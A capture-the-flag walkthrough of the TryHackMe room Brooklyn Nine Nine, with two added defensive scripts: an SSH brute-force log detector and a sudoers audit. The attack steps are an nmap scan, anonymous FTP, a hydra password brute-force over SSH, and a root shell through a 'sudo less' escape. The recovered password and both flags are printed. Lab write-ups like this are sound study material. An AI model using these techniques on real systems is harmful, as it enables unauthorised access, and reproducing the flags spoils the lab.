Today we are going to hack the TryHackMe machine called
Brooklyn Nine Nine. You can download it from the following link:
Brooklyn Nine Nine
Enumeration
We start with an nmap scan to see which ports are open.
~ > nmap -A 10.10.60.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST
Nmap scan report for 10.10.60.217
Host is up (0.057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.24.208
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds
Nmap shows that we can log in to the FTP server as the anonymous user.
We connect to the FTP server to see if there is anything interesting.
~ > ftp 10.10.60.217
Connected to 10.10.60.217.
220 (vsFTPd 3.0.3)
Name (10.10.60.217:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
226 Directory send OK.
We see the file note_to_jake.txt, so we download it.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.11 secs (1.0441 kB/s)
ftp> exit
221 Goodbye.
We look at the contents of the file.
~ > cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and holt will be mad if
someone hacks into the nine nine
We can see that Amy tells Jake to change his password because it is weak.
With this information, we use hydra to brute-force jake's password over SSH.
~ > hydra -l jake -P rockyou.txt 10.10.60.217 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 08:14:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.217:22/
[22][ssh] host: 10.10.60.217 login: jake password: 987654321
We get the password!
We use jake's credentials to connect over SSH...
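A brute-force run like the one above leaves a very recognisable trace in the target's sshd log: a burst of "Failed password" events for one user from one address, followed by an "Accepted password" from the same pair. The following detection script is an added example, not part of the original writeup; the auth.log lines it works on are constructed (the hostname and the scanning address are taken from the nmap output above, the PIDs and ports are made up).

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log events relevant to a password-guessing run against sshd.
_FAILED = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
_ACCEPTED = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                       r"Accepted password for (?P<user>\S+) from (?P<ip>\S+)")

def _ts(text, year=2020):
    # syslog timestamps carry no year; the constructed sample is from 2020
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def detect_ssh_bruteforce(lines, threshold=5, window=60):
    """Return alerts for (ip, user) pairs that reach `threshold` failed logins
    inside `window` seconds, and for a successful login right after such a burst."""
    recent = defaultdict(list)   # (ip, user) -> failure timestamps still in window
    alerts = []
    for line in lines:
        fail, ok = _FAILED.match(line), _ACCEPTED.match(line)
        m = fail or ok
        if not m:
            continue
        key, now = (m["ip"], m["user"]), _ts(m["ts"])
        recent[key] = [t for t in recent[key] if (now - t).total_seconds() <= window]
        if fail:
            recent[key].append(now)
            if len(recent[key]) == threshold:      # fire once per burst, not per attempt
                alerts.append(("bruteforce", *key))
        elif len(recent[key]) >= threshold:        # the guess that finally worked
            alerts.append(("success_after_bruteforce", *key))
    return alerts

# Constructed auth.log excerpt (not taken from the room): a hydra-style burst
# against jake from the scanning host, one unrelated failed login from another
# address, then the successful login with the guessed password.
SAMPLE_LOG = """\
Aug  8 08:14:36 brookly_nine_nine sshd[1401]: Failed password for jake from 10.9.24.208 port 40122 ssh2
Aug  8 08:14:36 brookly_nine_nine sshd[1403]: Failed password for jake from 10.9.24.208 port 40124 ssh2
Aug  8 08:14:37 brookly_nine_nine sshd[1405]: Failed password for jake from 10.9.24.208 port 40126 ssh2
Aug  8 08:14:37 brookly_nine_nine sshd[1407]: Failed password for jake from 10.9.24.208 port 40128 ssh2
Aug  8 08:14:38 brookly_nine_nine sshd[1409]: Failed password for jake from 10.9.24.208 port 40130 ssh2
Aug  8 08:14:38 brookly_nine_nine sshd[1411]: Failed password for jake from 10.9.24.208 port 40132 ssh2
Aug  8 08:14:39 brookly_nine_nine sshd[1413]: Failed password for amy from 10.9.24.50 port 51000 ssh2
Aug  8 08:14:41 brookly_nine_nine sshd[1415]: Accepted password for jake from 10.9.24.208 port 40140 ssh2
""".splitlines()

if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single failure for amy stays below the threshold and produces nothing; the jake burst raises one alert when the fifth failure lands and a second, higher-severity one when the login succeeds.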
Low Shell
We log in as jake.
~ > ssh jake@10.10.60.217
jake@10.10.60.217's password:
Last login: Tue May 26 08:56:58 2020
user.txt
We explore the system to look for the user flag.
jake@brookly_nine_nine:/home$ cd /home
jake@brookly_nine_nine:/home$ ls
amy holt jake
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ ls -la
total 48
drwxr-xr-x 6 holt holt 4096 May 26 09:01 .
drwxr-xr-x 5 root root 4096 May 18 10:21 ..
-rw------- 1 holt holt 18 May 26 09:01 .bash_history
-rw-r--r-- 1 holt holt 220 May 17 21:42 .bash_logout
-rw-r--r-- 1 holt holt 3771 May 17 21:42 .bashrc
drwx------ 2 holt holt 4096 May 18 10:24 .cache
drwx------ 3 holt holt 4096 May 18 10:24 .gnupg
drwxrwxr-x 3 holt holt 4096 May 17 21:46 .local
-rw-r--r-- 1 holt holt 807 May 17 21:42 .profile
drwx------ 2 holt holt 4096 May 18 14:45 .ssh
-rw------- 1 root root 110 May 18 17:12 nano.save
-rw-rw-r-- 1 holt holt 33 May 17 21:49 user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee
We check whether we can do anything with sudo.
jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
Privilege Escalation
We see that we can run less, which can allow us to obtain a privileged shell.
To do this we run:
Once the file is being displayed, we type:
!/bin/bash
And now we have a root shell.
root@brookly_nine_nine:~# id
uid=0(root) gid=0(root) groups=0(root)
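The root cause here is a sudoers rule that hands a pager with a built-in shell escape to an unprivileged user. The audit below is an added example, not part of the original writeup: it parses a sudoers file, reports rules that grant such commands, and treats a per-command `Defaults!<cmd> noexec` line (the sudoers(5) mitigation for editors and pagers) as clearing the finding. The sudoers content is constructed; only the jake line reproduces the rule that `sudo -l` reported above.

```python
import os
import re

# Pagers and editors with a built-in shell escape; sudoers(5) singles these out
# because allowing them through sudo is equivalent to allowing a root shell.
SHELL_ESCAPE = {"less", "more", "man", "vi", "vim", "nano"}

_RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
                   r"(?:\([^)]*\)\s*)?(?P<cmds>.+)$")
_NOEXEC = re.compile(r"^Defaults!(?P<cmd>\S+)\s+noexec\b")
_TAGS = ("NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:")

def audit_sudoers(text):
    """Return rules that grant a shell-escape-capable command without noexec."""
    noexec, findings = set(), []
    lines = [l.split("#", 1)[0].strip() for l in text.splitlines()]
    # Defaults! lines apply to the command wherever it is granted, so collect them first.
    for line in lines:
        m = _NOEXEC.match(line)
        if m:
            noexec.add(m["cmd"])
    for line in lines:
        if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        cmds = m["cmds"]
        nopasswd = "NOPASSWD:" in cmds
        for tag in _TAGS:
            cmds = cmds.replace(tag, "")
        for cmd in (c.strip() for c in cmds.split(",") if c.strip()):
            path = cmd.split()[0]
            if os.path.basename(path) in SHELL_ESCAPE and path not in noexec:
                findings.append({"user": m["who"], "command": path, "nopasswd": nopasswd})
    return findings

# Constructed /etc/sudoers (not the room's file); the jake line reproduces the
# rule that `sudo -l` reported on the box.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
holt ALL=(root) /usr/bin/systemctl restart apache2
jake ALL=(ALL) NOPASSWD: /usr/bin/less
"""
# Same file with the per-command noexec default that blocks the pager's shell escape.
HARDENED_SUDOERS = SAMPLE_SUDOERS + "Defaults!/usr/bin/less noexec\n"

if __name__ == "__main__":
    print(audit_sudoers(SAMPLE_SUDOERS))    # the jake/less rule is reported
    print(audit_sudoers(HARDENED_SUDOERS))  # nothing reported
```

The better fix is still to not grant less at all; noexec is a second line of defence, and sudoers(5) notes it only covers dynamically linked programs.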
root.txt
root@brookly_nine_nine:/root# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845
Enjoy!!
root@brookly_nine_nine:/root#